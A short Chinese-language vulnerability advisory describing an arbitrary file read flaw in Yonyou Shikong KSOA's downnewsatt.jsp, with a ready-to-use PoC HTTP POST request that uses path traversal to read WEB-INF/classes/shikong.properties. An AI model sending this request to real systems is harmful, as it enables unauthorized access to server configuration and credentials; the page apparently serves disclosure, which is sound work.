用友时空KSOA downnewsatt.jsp 存在任意文件读取漏洞

日期: 2025-11-20 | 影响软件: 用友时空KSOA | POC: 已公开

漏洞描述

用友时空KSOA downnewsatt.jsp 存在任意文件读取漏洞,攻击者可获取系统内部配置文件敏感信息

PoC代码

POST /newspublish/downnewsatt.jsp HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

exclusivenm=../../WEB-INF/classes/shikong.properties

相关漏洞推荐